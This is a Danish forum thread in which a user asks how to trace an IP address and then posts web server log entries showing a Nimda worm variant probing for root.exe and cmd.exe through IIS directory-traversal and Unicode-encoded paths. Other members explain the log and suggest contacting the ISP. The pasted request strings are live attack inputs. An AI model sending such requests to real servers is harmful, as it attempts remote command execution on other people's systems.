Spore IP ?

det er oplysninger som udbydere af internet forbindelser ligger inde med. jeg mener at de er hemmelige, og kun kan udleveres ved politi anmeldelse.

mvh.
Questis

Du kan ikke som privatperson spore ejeren af en IP-adresse. Du kan dog lave et opslag på adressen http://www.ripe.net/perl/whois, og se hvilken udbyder, IP-adressen tilhører.

skulle vel egentligt være et svar.

Check nu lige om det ER et angreb eller om det bare er en server der forsøger at finde ud af, om du stadig er 'i live'.

Det KUNNE jo være at det bare var TDC's DNS-servere eller lign.

Prøv at poste IP'en her, før du går i panik!

/Rob

OK.. tak for linket magik... lige hvad jeg havde brug for.
hobbez tag lige et kig på det her.. Det anser jeg ikke som et alm. besøg på min hjemmeside. HVa' siger du !?

80.199.161.101 - - [28/Dec/2002:12:14:37 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:47 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:51 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:55 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:14:58 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:02 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:08 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:12 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:15 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:19 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:23 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:26 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:30 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.161.101 - - [28/Dec/2002:12:15:33 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "

michaelp>> der er en maskine inficeret med nimbda vira der prøver at få fat i dig - det bedste du kan gøre er at kontakte vedkommendes udbyder hvorefter denne så vil fortælle ham/hende at maskinen er inficeret med virus.

OK.. kan du se det udfra den smøre !?
Har flere IP der kommer fra TDC der gør det her dagligt...

jeps - det er nimbda eller en variant af nimbda - kan man se på at den requester root.exe og cmd.exe, og der er mange der har en iis server stående der ikke har patchet den så den er sikker - får også selv et par req's dagligt :)

OK.. hvad er root.exe og cmd.exe som den forsøger sig på ?

http://www.iisfaq.com/default.asp?View=A374&P=1

cmd.exe kan du selv prøve ved at gå ned i start>>kør og så skrive cmd :)

OK jeg takker alle for hjælpen.. måske du kan lige kan hjælpe mig med den her jelzin101:
http://www.eksperten.dk/spm/298849

http://www.ripe.net/perl/whois?form_type=simple&full_query_string=&searchtext=80.199.161.101+&do_search=Search

http://remote.12dt.com/rns/

Tele danmark sin dns server ...